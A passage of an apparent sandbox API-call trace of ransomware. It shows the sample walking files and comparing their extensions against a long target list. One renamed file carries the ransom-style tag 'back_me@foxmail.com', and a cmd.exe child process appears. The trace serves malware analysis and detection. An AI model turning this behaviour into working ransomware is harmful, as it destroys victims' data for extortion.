(lpString1=".ai8", lpString2=".ini") returned -1 [0241.424] lstrlenW (lpString=".anim") returned 5 [0241.424] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1 [0241.424] lstrlenW (lpString=".arw") returned 4 [0241.424] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0241.424] lstrlenW (lpString=".as") returned 3 [0241.424] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0241.424] lstrlenW (lpString=".asa") returned 4 [0241.424] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 [0241.424] lstrlenW (lpString=".asc") returned 4 [0241.424] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0241.424] lstrlenW (lpString=".ascx") returned 5 [0241.424] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1 [0241.424] lstrlenW (lpString=".asm") returned 4 [0241.424] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0241.424] lstrlenW (lpString=".asmx") returned 5 [0241.424] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1 [0241.424] lstrlenW (lpString=".asp") returned 4 [0241.424] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1 [0241.424] lstrlenW (lpString=".aspx") returned 5 [0241.424] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1 [0241.424] lstrlenW (lpString=".asr") returned 4 [0241.424] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0241.424] lstrlenW (lpString=".asx") returned 4 [0241.424] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0241.424] lstrlenW (lpString=".avi") returned 4 [0241.424] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0241.425] lstrlenW (lpString=".avs") returned 4 [0241.425] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0241.425] lstrlenW (lpString=".backup") returned 7 [0241.425] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1 [0241.425] lstrlenW (lpString=".bak") returned 4 [0241.425] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0241.425] lstrlenW (lpString=".bay") returned 4 [0241.425] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0241.425] lstrlenW (lpString=".bd") returned 3 [0241.425] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0241.425] lstrlenW (lpString=".bin") returned 4 [0241.425] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0241.425] lstrlenW (lpString=".bmp") returned 4 [0241.425] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0241.425] lstrlenW (lpString=".bz2") returned 4 [0241.425] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0241.425] lstrlenW (lpString=".c") returned 2 [0241.425] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0241.425] lstrlenW (lpString=".cdr") returned 4 [0241.425] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0241.425] lstrlenW (lpString=".cer") returned 4 [0241.425] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0241.425] lstrlenW (lpString=".cf") returned 3 [0241.425] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0241.425] lstrlenW (lpString=".cfc") returned 4 [0241.425] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0241.425] lstrlenW (lpString=".cfm") returned 4 [0241.425] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0241.425] lstrlenW (lpString=".cfml") returned 5 [0241.425] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1 [0241.425] lstrlenW (lpString=".cfu") returned 4 [0241.425] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0241.426] lstrlenW (lpString=".chm") returned 4 [0241.426] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0241.426] lstrlenW (lpString=".cin") returned 4 [0241.426] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0241.426] lstrlenW (lpString=".class") returned 6 [0241.426] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1 [0241.426] lstrlenW (lpString=".clx") returned 4 [0241.426] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0241.426] lstrlenW (lpString=".config") returned 7 [0241.426] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1 [0241.426] lstrlenW (lpString=".cpp") returned 4 [0241.426] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0241.426] lstrlenW (lpString=".cr2") returned 4 [0241.426] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0241.426] lstrlenW (lpString=".crt") returned 4 [0241.426] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0241.426] lstrlenW (lpString=".crw") returned 4 [0241.426] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0241.426] lstrlenW (lpString=".cs") returned 3 [0241.426] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0241.426] lstrlenW (lpString=".css") returned 4 [0241.426] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0241.426] lstrlenW (lpString=".csv") returned 4 [0241.426] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0241.426] lstrlenW (lpString=".cub") returned 4 [0241.426] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0241.426] lstrlenW (lpString=".dae") returned 4 [0241.426] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0241.426] lstrlenW (lpString=".dat") returned 4 [0241.426] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0241.426] lstrlenW (lpString=".db") returned 3 [0241.426] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0241.427] lstrlenW (lpString=".dbf") returned 4 [0241.427] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0241.427] lstrlenW (lpString=".dbx") returned 4 [0241.427] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0241.427] lstrlenW (lpString=".dc3") returned 4 [0241.427] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0241.427] lstrlenW (lpString=".dcm") returned 4 [0241.427] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0241.427] lstrlenW (lpString=".dcr") returned 4 [0241.427] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0241.427] lstrlenW (lpString=".der") returned 4 [0241.427] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0241.427] lstrlenW (lpString=".dib") returned 4 [0241.427] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0241.427] lstrlenW (lpString=".dic") returned 4 [0241.427] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0241.427] lstrlenW (lpString=".dif") returned 4 [0241.427] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0241.427] lstrlenW (lpString=".divx") returned 5 [0241.427] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1 [0241.427] lstrlenW (lpString=".djvu") returned 5 [0241.427] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1 [0241.427] lstrlenW (lpString=".dng") returned 4 [0241.427] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0241.427] lstrlenW (lpString=".doc") returned 4 [0241.427] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0241.427] lstrlenW (lpString=".docm") returned 5 [0241.427] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1 [0241.427] lstrlenW (lpString=".docx") returned 5 [0241.427] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0241.427] lstrlenW (lpString=".dot") returned 4 [0241.428] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0241.428] lstrlenW (lpString=".dotm") returned 5 [0241.428] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1 [0241.428] lstrlenW (lpString=".dotx") returned 5 [0241.428] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1 [0241.428] lstrlenW (lpString=".dpx") returned 4 [0241.428] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0241.428] lstrlenW (lpString=".dqy") returned 4 [0241.428] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0241.428] lstrlenW (lpString=".dsn") returned 4 [0241.428] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0241.428] lstrlenW (lpString=".dt") returned 3 [0241.428] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0241.428] lstrlenW (lpString=".dtd") returned 4 [0241.428] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0241.428] lstrlenW (lpString=".dwg") returned 4 [0241.428] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0241.428] lstrlenW (lpString=".dwt") returned 4 [0241.428] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0241.428] lstrlenW (lpString=".dx") returned 3 [0241.428] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0241.428] lstrlenW (lpString=".dxf") returned 4 [0241.428] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0241.428] lstrlenW (lpString=".edml") returned 5 [0241.428] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1 [0241.428] lstrlenW (lpString=".efd") returned 4 [0241.428] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0241.428] lstrlenW (lpString=".elf") returned 4 [0241.428] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0241.428] lstrlenW (lpString=".emf") returned 4 [0241.428] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1 [0241.428] lstrlenW (lpString=".emz") returned 4 [0241.429] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1 [0241.429] lstrlenW (lpString=".epf") returned 4 [0241.429] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1 [0241.429] lstrlenW (lpString=".eps") returned 4 [0241.429] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1 [0241.429] lstrlenW (lpString=".epsf") returned 5 [0241.429] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1 [0241.429] lstrlenW (lpString=".epsp") returned 5 [0241.429] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1 [0241.429] lstrlenW (lpString=".erf") returned 4 [0241.429] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1 [0241.429] lstrlenW (lpString=".exr") returned 4 [0241.429] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1 [0241.429] lstrlenW (lpString=".f4v") returned 4 [0241.429] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1 [0241.429] lstrlenW (lpString=".fido") returned 5 [0241.429] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1 [0241.429] lstrlenW (lpString=".flm") returned 4 [0241.429] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1 [0241.429] lstrlenW (lpString=".flv") returned 4 [0241.429] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0241.429] lstrlenW (lpString=".frm") returned 4 [0241.429] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1 [0241.429] lstrlenW (lpString=".fxg") returned 4 [0241.429] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1 [0241.429] lstrlenW (lpString=".geo") returned 4 [0241.429] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1 [0241.429] lstrlenW (lpString=".gif") returned 4 [0241.429] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0241.429] lstrlenW (lpString=".grs") returned 4 [0241.429] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1 [0241.429] lstrlenW (lpString=".gz") returned 3 [0241.430] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1 [0241.430] lstrlenW (lpString=".h") returned 2 [0241.430] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1 [0241.430] lstrlenW (lpString=".hdr") returned 4 [0241.430] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1 [0241.430] lstrlenW (lpString=".hpp") returned 4 [0241.430] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1 [0241.430] lstrlenW (lpString=".hta") returned 4 [0241.430] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1 [0241.430] lstrlenW (lpString=".htc") returned 4 [0241.430] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1 [0241.430] lstrlenW (lpString=".htm") returned 4 [0241.430] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0241.430] lstrlenW (lpString=".html") returned 5 [0241.430] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1 [0241.430] lstrlenW (lpString=".icb") returned 4 [0241.430] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1 [0241.430] lstrlenW (lpString=".ics") returned 4 [0241.430] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1 [0241.430] lstrlenW (lpString=".iff") returned 4 [0241.430] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1 [0241.430] lstrlenW (lpString=".inc") returned 4 [0241.430] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1 [0241.430] lstrlenW (lpString=".indd") returned 5 [0241.430] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1 [0241.430] lstrlenW (lpString=".ini") returned 4 [0241.430] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0241.430] FindNextFileW (in: hFindFile=0xbc53b0, lpFindFileData=0x3cef808 | out: lpFindFileData=0x3cef808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3ebb1770, ftCreationTime.dwHighDateTime=0x1d5351d, ftLastAccessTime.dwLowDateTime=0x3ebb1770, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x3ebd78d0, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id-9C354B42.[back_me@foxmail.com].php", cAlternateFileName="DESKTO~1.PHP")) returned 1 [0241.430] lstrlenW (lpString="desktop.ini.id-9C354B42.[back_me@foxmail.com].php") returned 49 [0241.430] lstrlenW (lpString=".1cd") returned 4 [0241.431] lstrcmpiW (lpString1=".1cd", lpString2=".php") returned -1 [0241.431] lstrlenW (lpString=".3ds") returned 4 [0241.431] lstrcmpiW (lpString1=".3ds", lpString2=".php") returned -1 [0241.431] lstrlenW (lpString=".3fr") returned 4 [0241.431] lstrcmpiW (lpString1=".3fr", lpString2=".php") returned -1 [0241.431] lstrlenW (lpString=".3g2") returned 4 [0241.431] lstrcmpiW (lpString1=".3g2", lpString2=".php") returned -1 [0241.431] lstrlenW (lpString=".3gp") returned 4 [0241.431] lstrcmpiW (lpString1=".3gp", lpString2=".php") returned -1 [0241.431] lstrlenW (lpString=".7z") returned 3 [0241.431] lstrcmpiW (lpString1=".7z", lpString2="php") returned -1 [0241.431] lstrlenW (lpString=".accda") returned 6 [0241.431] lstrcmpiW (lpString1=".accda", lpString2="m].php") returned -1 [0241.431] lstrlenW (lpString=".accdb") returned 6 [0241.431] lstrcmpiW (lpString1=".accdb", lpString2="m].php") returned -1 [0241.431] lstrlenW (lpString=".accdc") returned 6 [0241.431] lstrcmpiW (lpString1=".accdc", lpString2="m].php") returned -1 [0241.431] lstrlenW (lpString=".accde") returned 6 [0241.431] lstrcmpiW (lpString1=".accde", lpString2="m].php") returned -1 [0241.431] lstrlenW (lpString=".accdt") returned 6 [0241.431] lstrcmpiW (lpString1=".accdt", lpString2="m].php") returned -1 [0241.431] lstrlenW (lpString=".accdw") returned 6 [0241.431] lstrcmpiW (lpString1=".accdw", lpString2="m].php") returned -1 [0241.431] lstrlenW (lpString=".adb") returned 4 [0241.431] lstrcmpiW (lpString1=".adb", lpString2=".php") returned -1 [0241.431] lstrlenW (lpString=".adp") returned 4 [0241.431] lstrcmpiW (lpString1=".adp", lpString2=".php") returned -1 [0241.431] lstrlenW (lpString=".ai") returned 3 [0241.431] lstrcmpiW (lpString1=".ai", lpString2="php") returned -1 [0241.431] lstrlenW (lpString=".ai3") returned 4 [0241.431] lstrcmpiW (lpString1=".ai3", lpString2=".php") returned -1 [0241.431] lstrlenW (lpString=".ai4") returned 4 [0241.431] lstrcmpiW (lpString1=".ai4", lpString2=".php") returned -1 [0241.432] lstrlenW (lpString=".ai5") returned 4 [0241.432] lstrcmpiW (lpString1=".ai5", lpString2=".php") returned -1 [0241.432] lstrlenW (lpString=".ai6") returned 4 [0241.432] lstrcmpiW (lpString1=".ai6", lpString2=".php") returned -1 [0241.432] lstrlenW (lpString=".ai7") returned 4 [0241.432] lstrcmpiW (lpString1=".ai7", lpString2=".php") returned -1 [0241.432] lstrlenW (lpString=".ai8") returned 4 [0241.432] lstrcmpiW (lpString1=".ai8", lpString2=".php") returned -1 [0241.432] lstrlenW (lpString=".anim") returned 5 [0241.432] lstrcmpiW (lpString1=".anim", lpString2="].php") returned -1 [0241.432] lstrlenW (lpString=".arw") returned 4 [0241.432] lstrcmpiW (lpString1=".arw", lpString2=".php") returned -1 [0241.432] lstrlenW (lpString=".as") returned 3 [0241.432] lstrcmpiW (lpString1=".as", lpString2="php") returned -1 [0241.432] lstrlenW (lpString=".asa") returned 4 [0241.432] lstrcmpiW (lpString1=".asa", lpString2=".php") returned -1 [0241.432] lstrlenW (lpString=".asc") returned 4 [0241.432] lstrcmpiW (lpString1=".asc", lpString2=".php") returned -1 [0241.432] lstrlenW (lpString=".ascx") returned 5 [0241.432] lstrcmpiW (lpString1=".ascx", lpString2="].php") returned -1 [0241.432] lstrlenW (lpString=".asm") returned 4 [0241.432] lstrcmpiW (lpString1=".asm", lpString2=".php") returned -1 [0241.432] lstrlenW (lpString=".asmx") returned 5 [0241.432] lstrcmpiW (lpString1=".asmx", lpString2="].php") returned -1 [0241.432] lstrlenW (lpString=".asp") returned 4 [0241.432] lstrcmpiW (lpString1=".asp", lpString2=".php") returned -1 [0241.432] lstrlenW (lpString=".aspx") returned 5 [0241.432] lstrcmpiW (lpString1=".aspx", lpString2="].php") returned -1 [0241.432] lstrlenW (lpString=".asr") returned 4 [0241.432] lstrcmpiW (lpString1=".asr", lpString2=".php") returned -1 [0241.432] lstrlenW (lpString=".asx") returned 4 [0241.432] lstrcmpiW (lpString1=".asx", lpString2=".php") returned -1 [0241.433] lstrlenW (lpString=".avi") returned 4 [0241.433] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0241.433] lstrlenW (lpString=".avs") returned 4 [0241.433] lstrcmpiW (lpString1=".avs", lpString2=".php") returned -1 [0241.433] lstrlenW (lpString=".backup") returned 7 [0241.433] lstrcmpiW (lpString1=".backup", lpString2="om].php") returned -1 [0241.433] lstrlenW (lpString=".bak") returned 4 [0241.433] lstrcmpiW (lpString1=".bak", lpString2=".php") returned -1 [0241.433] lstrlenW (lpString=".bay") returned 4 [0241.433] lstrcmpiW (lpString1=".bay", lpString2=".php") returned -1 [0241.433] lstrlenW (lpString=".bd") returned 3 [0241.433] lstrcmpiW (lpString1=".bd", lpString2="php") returned -1 [0241.433] lstrlenW (lpString=".bin") returned 4 [0241.433] lstrcmpiW (lpString1=".bin", lpString2=".php") returned -1 [0241.433] lstrlenW (lpString=".bmp") returned 4 [0241.433] lstrcmpiW (lpString1=".bmp", lpString2=".php") returned -1 [0241.433] lstrlenW (lpString=".bz2") returned 4 [0241.433] lstrcmpiW (lpString1=".bz2", lpString2=".php") returned -1 [0241.433] lstrlenW (lpString=".c") returned 2 [0241.433] lstrcmpiW (lpString1=".c", lpString2="hp") returned -1 [0241.433] lstrlenW (lpString=".cdr") returned 4 [0241.433] lstrcmpiW (lpString1=".cdr", lpString2=".php") returned -1 [0241.433] lstrlenW (lpString=".cer") returned 4 [0241.433] lstrcmpiW (lpString1=".cer", lpString2=".php") returned -1 [0241.433] lstrlenW (lpString=".cf") returned 3 [0241.433] lstrcmpiW (lpString1=".cf", lpString2="php") returned -1 [0241.433] lstrlenW (lpString=".cfc") returned 4 [0241.433] lstrcmpiW (lpString1=".cfc", lpString2=".php") returned -1 [0241.433] lstrlenW (lpString=".cfm") returned 4 [0241.433] lstrcmpiW (lpString1=".cfm", lpString2=".php") returned -1 [0241.433] lstrlenW (lpString=".cfml") returned 5 [0241.433] lstrcmpiW (lpString1=".cfml", lpString2="].php") returned -1 [0241.434] lstrlenW (lpString=".cfu") returned 4 [0241.434] lstrcmpiW (lpString1=".cfu", lpString2=".php") returned -1 [0241.434] lstrlenW (lpString=".chm") returned 4 [0241.434] lstrcmpiW (lpString1=".chm", lpString2=".php") returned -1 [0241.434] lstrlenW (lpString=".cin") returned 4 [0241.434] lstrcmpiW (lpString1=".cin", lpString2=".php") returned -1 [0241.434] lstrlenW (lpString=".class") returned 6 [0241.434] lstrcmpiW (lpString1=".class", lpString2="m].php") returned -1 [0241.434] lstrlenW (lpString=".clx") returned 4 [0241.434] lstrcmpiW (lpString1=".clx", lpString2=".php") returned -1 [0241.434] lstrlenW (lpString=".config") returned 7 [0241.434] lstrcmpiW (lpString1=".config", lpString2="om].php") returned -1 [0241.434] lstrlenW (lpString=".cpp") returned 4 [0241.434] lstrcmpiW (lpString1=".cpp", lpString2=".php") returned -1 [0241.434] lstrlenW (lpString=".cr2") returned 4 [0241.434] lstrcmpiW (lpString1=".cr2", lpString2=".php") returned -1 [0241.434] lstrlenW (lpString=".crt") returned 4 [0241.434] lstrcmpiW (lpString1=".crt", lpString2=".php") returned -1 [0241.434] lstrlenW (lpString=".crw") returned 4 [0241.434] lstrcmpiW (lpString1=".crw", lpString2=".php") returned -1 [0241.434] lstrlenW (lpString=".cs") returned 3 [0241.434] lstrcmpiW (lpString1=".cs", lpString2="php") returned -1 [0241.434] lstrlenW (lpString=".css") returned 4 [0241.434] lstrcmpiW (lpString1=".css", lpString2=".php") returned -1 [0241.434] lstrlenW (lpString=".csv") returned 4 [0241.434] lstrcmpiW (lpString1=".csv", lpString2=".php") returned -1 [0241.434] lstrlenW (lpString=".cub") returned 4 [0241.434] lstrcmpiW (lpString1=".cub", lpString2=".php") returned -1 [0241.434] lstrlenW (lpString=".dae") returned 4 [0241.434] lstrcmpiW (lpString1=".dae", lpString2=".php") returned -1 [0241.434] lstrlenW (lpString=".dat") returned 4 [0241.435] lstrcmpiW (lpString1=".dat", lpString2=".php") returned -1 [0241.435] lstrlenW (lpString=".db") returned 3 [0241.435] lstrcmpiW (lpString1=".db", lpString2="php") returned -1 [0241.435] lstrlenW (lpString=".dbf") returned 4 [0241.435] lstrcmpiW (lpString1=".dbf", lpString2=".php") returned -1 [0241.435] lstrlenW (lpString=".dbx") returned 4 [0241.435] lstrcmpiW (lpString1=".dbx", lpString2=".php") returned -1 [0241.435] lstrlenW (lpString=".dc3") returned 4 [0241.435] lstrcmpiW (lpString1=".dc3", lpString2=".php") returned -1 [0241.435] lstrlenW (lpString=".dcm") returned 4 [0241.435] lstrcmpiW (lpString1=".dcm", lpString2=".php") returned -1 [0241.435] lstrlenW (lpString=".dcr") returned 4 [0241.435] lstrcmpiW (lpString1=".dcr", lpString2=".php") returned -1 [0241.435] lstrlenW (lpString=".der") returned 4 [0241.435] lstrcmpiW (lpString1=".der", lpString2=".php") returned -1 [0241.435] lstrlenW (lpString=".dib") returned 4 [0241.435] lstrcmpiW (lpString1=".dib", lpString2=".php") returned -1 [0241.435] lstrlenW (lpString=".dic") returned 4 [0241.435] lstrcmpiW (lpString1=".dic", lpString2=".php") returned -1 [0241.435] lstrlenW (lpString=".dif") returned 4 [0241.435] lstrcmpiW (lpString1=".dif", lpString2=".php") returned -1 [0241.435] lstrlenW (lpString=".divx") returned 5 [0241.435] lstrcmpiW (lpString1=".divx", lpString2="].php") returned -1 [0241.435] lstrlenW (lpString=".djvu") returned 5 [0241.435] lstrcmpiW (lpString1=".djvu", lpString2="].php") returned -1 [0241.435] lstrlenW (lpString=".dng") returned 4 [0241.435] lstrcmpiW (lpString1=".dng", lpString2=".php") returned -1 [0241.435] lstrlenW (lpString=".doc") returned 4 [0241.435] lstrcmpiW (lpString1=".doc", lpString2=".php") returned -1 [0241.435] lstrlenW (lpString=".docm") returned 5 [0241.435] lstrcmpiW (lpString1=".docm", lpString2="].php") returned -1 [0241.436] lstrlenW (lpString=".docx") returned 5 [0241.436] lstrcmpiW (lpString1=".docx", lpString2="].php") returned -1 [0241.436] lstrlenW (lpString=".dot") returned 4 [0241.436] lstrcmpiW (lpString1=".dot", lpString2=".php") returned -1 [0241.436] lstrlenW (lpString=".dotm") returned 5 [0241.436] lstrcmpiW (lpString1=".dotm", lpString2="].php") returned -1 [0241.436] lstrlenW (lpString=".dotx") returned 5 [0241.436] lstrcmpiW (lpString1=".dotx", lpString2="].php") returned -1 [0241.436] lstrlenW (lpString=".dpx") returned 4 [0241.436] lstrcmpiW (lpString1=".dpx", lpString2=".php") returned -1 [0241.436] lstrlenW (lpString=".dqy") returned 4 [0241.436] lstrcmpiW (lpString1=".dqy", lpString2=".php") returned -1 [0241.436] lstrlenW (lpString=".dsn") returned 4 [0241.436] lstrcmpiW (lpString1=".dsn", lpString2=".php") returned -1 [0241.436] lstrlenW (lpString=".dt") returned 3 [0241.436] lstrcmpiW (lpString1=".dt", lpString2="php") returned -1 [0241.436] lstrlenW (lpString=".dtd") returned 4 [0241.436] lstrcmpiW (lpString1=".dtd", lpString2=".php") returned -1 [0241.436] lstrlenW (lpString=".dwg") returned 4 [0241.436] lstrcmpiW (lpString1=".dwg", lpString2=".php") returned -1 [0241.436] lstrlenW (lpString=".dwt") returned 4 [0241.436] lstrcmpiW (lpString1=".dwt", lpString2=".php") returned -1 [0241.436] lstrlenW (lpString=".dx") returned 3 [0241.436] lstrcmpiW (lpString1=".dx", lpString2="php") returned -1 [0241.436] lstrlenW (lpString=".dxf") returned 4 [0241.436] lstrcmpiW (lpString1=".dxf", lpString2=".php") returned -1 [0241.436] lstrlenW (lpString=".edml") returned 5 [0241.436] lstrcmpiW (lpString1=".edml", lpString2="].php") returned -1 [0241.436] lstrlenW (lpString=".efd") returned 4 [0241.436] lstrcmpiW (lpString1=".efd", lpString2=".php") returned -1 [0241.436] lstrlenW (lpString=".elf") returned 4 [0241.436] lstrcmpiW (lpString1=".elf", lpString2=".php") returned -1 [0241.437] lstrlenW (lpString=".emf") returned 4 [0241.437] lstrcmpiW (lpString1=".emf", lpString2=".php") returned -1 [0241.437] lstrlenW (lpString=".emz") returned 4 [0241.437] lstrcmpiW (lpString1=".emz", lpString2=".php") returned -1 [0241.437] lstrlenW (lpString=".epf") returned 4 [0241.437] lstrcmpiW (lpString1=".epf", lpString2=".php") returned -1 [0241.437] lstrlenW (lpString=".eps") returned 4 [0241.437] lstrcmpiW (lpString1=".eps", lpString2=".php") returned -1 [0241.437] lstrlenW (lpString=".epsf") returned 5 [0241.437] lstrcmpiW (lpString1=".epsf", lpString2="].php") returned -1 [0241.437] lstrlenW (lpString=".epsp") returned 5 [0241.437] lstrcmpiW (lpString1=".epsp", lpString2="].php") returned -1 [0241.437] lstrlenW (lpString=".erf") returned 4 [0241.437] lstrcmpiW (lpString1=".erf", lpString2=".php") returned -1 [0241.437] lstrlenW (lpString=".exr") returned 4 [0241.437] lstrcmpiW (lpString1=".exr", lpString2=".php") returned -1 [0241.437] lstrlenW (lpString=".f4v") returned 4 [0241.437] lstrcmpiW (lpString1=".f4v", lpString2=".php") returned -1 [0241.437] lstrlenW (lpString=".fido") returned 5 [0241.437] lstrcmpiW (lpString1=".fido", lpString2="].php") returned -1 [0241.437] lstrlenW (lpString=".flm") returned 4 [0241.437] lstrcmpiW (lpString1=".flm", lpString2=".php") returned -1 [0241.437] lstrlenW (lpString=".flv") returned 4 [0241.437] lstrcmpiW (lpString1=".flv", lpString2=".php") returned -1 [0241.437] lstrlenW (lpString=".frm") returned 4 [0241.437] lstrcmpiW (lpString1=".frm", lpString2=".php") returned -1 [0241.437] lstrlenW (lpString=".fxg") returned 4 [0241.437] lstrcmpiW (lpString1=".fxg", lpString2=".php") returned -1 [0241.437] lstrlenW (lpString=".geo") returned 4 [0241.437] lstrcmpiW (lpString1=".geo", lpString2=".php") returned -1 [0241.437] lstrlenW (lpString=".gif") returned 4 [0241.437] lstrcmpiW (lpString1=".gif", lpString2=".php") returned -1 [0241.438] lstrlenW (lpString=".grs") returned 4 [0241.438] lstrcmpiW (lpString1=".grs", lpString2=".php") returned -1 Thread: id = 65 os_tid = 0x654 Thread: id = 66 os_tid = 0x65c Process: id = "10" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x70e30000" os_pid = "0x5c4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x55c" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e4d3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 48 os_tid = 0x5c8 [0243.575] 